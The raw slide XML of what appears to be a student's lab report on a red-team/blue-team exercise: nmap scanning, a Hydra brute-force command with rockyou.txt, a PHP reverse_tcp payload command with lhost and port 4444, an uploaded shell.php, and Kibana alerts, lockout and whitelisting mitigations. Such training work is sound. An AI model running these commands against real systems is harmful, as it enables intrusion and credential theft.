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8B91C2-FD8F-47D3-A9D9-C75ECD87FD0A}">
  <a:tblStyle styleId="{148B91C2-FD8F-47D3-A9D9-C75ECD87F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/>
    <p:restoredTop sz="94650"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="160" d="100"/>
          <a:sy n="160" d="100"/>
        </p:scale>
        <p:origin x="568" y="17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Reverse shell payload  was also created. The command used was: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–p php/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reverse_tcp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lhost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=192.168.1.90 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lport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=4444 &gt;&gt; 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process was carried out to establish a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session.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1DB3059-A4B9-134C-92C5-0F2CAB6B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85" y="1480576"/>
            <a:ext cx="2284680" cy="3154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port scan occur? – 6/22/2021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packets were sent, and from which IP?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indicates that this was a port scan?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CB99FF13-9F5B-374F-83BC-31CEF5B24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67799"/>
            <a:ext cx="8409300" cy="33412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request occur? - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6/22/2021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made? – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16,872</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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What did they contain? – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr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1392E9C-B9DA-044E-8BB2-A094BAF78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67799"/>
            <a:ext cx="8409300" cy="3216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367350" y="1533125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attack? – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16,872</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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password? – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16,869</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr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AABCFC0-A22C-404B-94C0-A52FE42D7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533124"/>
            <a:ext cx="8409300" cy="32380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to this directory? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- 24</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr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1146AEC-3A01-B746-960A-97B36E55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67799"/>
            <a:ext cx="8409300" cy="2999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CB5B9D-8112-1C4F-9A15-732473DEE03B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530578" y="4617156"/>
            <a:ext cx="4897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sz="1200" dirty="0"/>
              <a:t>Phone screenshot used because I could not do screenshot on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>imac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*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70C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configure firewalls to detect and shut down port scans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70C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patching: updating system to latest version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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Whitelisting IP addresses</a:t>
            </a:r>
            <a:endParaRPr sz="10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Load Balancer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Whitelisting only accepts connections from trusted IP address ranges.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Installing a load balancer will help lighten traffic burden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr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70C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patch: Invalid credential lock out</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr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Whitelisting IP addresses</a:t>
            </a:r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Load Balancer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Invalid credential lockout – Prevents excess login attempts. Can be implemented by activating  lockout/timeout.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Whitelisting- System should only accept connection from trusted IP address ranges.</a:t>
            </a:r>
            <a:endParaRPr sz="1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Index patterns: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winlogbeat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> query: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>event.code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 4625</a:t>
            </a:r>
            <a:endParaRPr sz="10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Field: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &gt;= Threshold 5</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr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Patch: Invalid credentials lock out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70C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelisting IP addresses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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invalid credentials lock out prevents excessive login attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installation: By implementing an account lockout system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelisting- System should only accept connection from trusted IP address ranges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr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Patch: Invalid credential lock out</a:t>
            </a:r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Whitelisting IP addresses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Invalid credential lockout – Prevents excess login attempts. Can be implemented by activating  lockout/timeout.</a:t>
            </a:r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Whitelisting- System should only accept connection from trusted IP address ranges.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Machine Learning: A machine learning rule can be set which creates an alert when machine learning job creates an anomaly.</a:t>
            </a:r>
            <a:endParaRPr sz="10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Security: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packetbeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> looks for unusual web browsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> activity that could indicate execution.</a:t>
            </a:r>
            <a:endParaRPr sz="10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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threshold: field: source: IP address outside whitelist.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Patch: Invalid credential lock out</a:t>
            </a:r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Whitelisting IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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Invalid credential lockout – Prevents excess login attempts. Can be implemented by activating  lockout/timeout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelisting- System should only accept connection from trusted IP address ranges.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368104" y="1117364"/>
            <a:ext cx="5213957" cy="3106293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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="800"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Address Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 10.0.0.1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IPv4: 192.168.1.1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OS: Microsoft Windows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Hostname: ELK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IPv4: 192.168.1.100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OS: Ubuntu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Hostname: ELK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IPv4: 192.168.1.105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OS: Ubuntu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Hostname: Target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IPv4: 192.168.1.90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OS: Ubuntu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/>
              <a:t>Hostname: Kali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3DFE3F-2BA3-8D4F-B55E-FD005572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" y="1262743"/>
            <a:ext cx="4410439" cy="28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237904794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{148B91C2-FD8F-47D3-A9D9-C75ECD87FD0A}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Machine with no open port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Machine with no open port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machine with open ports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Machine used to Exploit vulnerable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179251516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{148B91C2-FD8F-47D3-A9D9-C75ECD87FD0A}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SSH. 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80/tcp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Nmap tool was used to exploit the vulnerabilities.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Ifconfig command was ran on Kali to determine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inet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 Then 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–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sV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was ran on 192.168.1.0/24 to identify all the virtual machines on the network. Specifically the vulnerable virtual machine with open ports.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exploit enumerated the virtual machines on the network and identified the open ports on the vulnerable virtual machine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E2AC27-92CC-8C44-9619-29CB97FA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081" y="1431525"/>
            <a:ext cx="2638176" cy="3252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Hydra was also used to determine the password of a secret folder. The hydra command used was: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Hydra –l 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–P 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rockyou.txt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–s 80 –f –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vV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192.168.1.105 http-get /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exploit was able to determine the password of a user on the system.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88E128-EC4E-C746-A04D-77692B1E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25" y="1480575"/>
            <a:ext cx="2728765" cy="3253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1218</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>190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Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Black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[Name of First Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [Name of Second Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [Name of Third Vulnerability]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Ade Adu</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-22T03:03:50Z</dcterms:modified>
</cp:coreProperties>
</file>